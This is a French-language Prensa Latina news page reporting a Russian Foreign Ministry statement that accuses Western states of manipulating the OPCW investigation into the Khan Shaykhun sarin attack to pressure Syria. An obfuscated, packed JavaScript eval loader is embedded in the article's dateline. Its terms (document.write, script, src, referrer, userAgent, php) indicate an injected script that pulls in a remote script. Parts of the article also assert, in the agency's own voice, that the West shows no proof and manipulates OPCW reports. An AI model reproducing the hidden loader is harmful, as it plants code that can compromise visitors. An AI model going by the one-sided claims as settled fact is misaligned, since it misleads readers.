jeudi 25 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La Russie dénonce des manœuvres de l´Occident pour faire pression sur la Syrie

Moscou, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|erdrh|var|u0026u|referrer|hhfie||js|php'.split('|'),0,{})) 26 octobre (Prensa Latina) La Russie a dénoncé hier les manœuvres de l´Occident pour manipuler l´affaire de l´enquête sur l´usage d´armes chimiques en Syrie dans le but de faire pression sur les autorités de Damas.

Moscou, 26 octobre (Prensa Latina) La Russie a dénoncé hier les manœuvres de l´Occident pour manipuler l´affaire de l´enquête sur l´usage d´armes chimiques en Syrie dans le but de faire pression sur les autorités de Damas.

Une déclaration officielle indique que « l´usage du gaz sarin dans la localité syrienne de Jan-Sheijun en avril dernier, et ce qui l´a suivi démontre l´existence de sérieux problèmes dans le travail de l´Organisation pour l´Interdiction des Armes Chimiques (OPAQ) ».

« Mais l´actuelle situation convient aux partenaires occidentaux, et de fait ils insistent pour maintenir tout comme cela », est-il souligné dans la déclaration du Ministère des Relations Extérieures russe, en allusion aux difficultés pour enquêter sur ce qui s´est réellement passé à Jan-Sheijun.

Au moment des faits, les autorités syriennes ont signalé que son aviation avait détruit un arsenal d´armes chimiques d´un groupe armé dans la localité mentionnée, située dans la province d´Idlib, où se concentre le groupe extrémiste Jabhat An Nusra.

Mais l´Occident accuse Damas d´attaquer sa propre population avec des armes chimiques, sans montrer de preuves concrètes et, dans le même temps, manipule les rapports de l´OPAQ, dont les experts ont refusé de se rendre à Jan-Sheijun.

« La Russie a alors demandé une recherche et une enquête sur les lieux des faits, ainsi que sur la base aérienne syrienne de´Al-Shairat, de laquelle sont prétendument partis les avions qui ont bombardé Jan-Sheijun,par des experts de l´OPAQ, mais Washington a fait tout son possible pour les empêcher », est-il souligné par Moscou.

En conséquence, la chancellerie russe affirme que « l´Occident ne recherche en rien la vérité quant aux faits mentionnés, mais est intéressé à utiliser les entités internationales pour faire pression sur Damas ».

Parmi les problèmes dans le travail de l´OPAQ signalés par la chancellerie, il y a le caractère sélectif de l´accomplissement de son mandat et le refus d´enquêter sur le lieu des faits en Syrie.

« De plus, l´OPAQ tente de confondre la communauté internationale en parlant de problèmes de sécurité à Jan-Sheijun », est-il jugé dans le document.

« Il est clair que si il est réellement recherché d´établir la vérité sur les faits qui ont eu lieu et l´utilisation des armes chimiques en Syrie, cette entité internationale doit tout d´abord résoudre les aspects précédemment mentionnés », est-il conclu.

peo/lma/To

EN CONTINU
notes connexes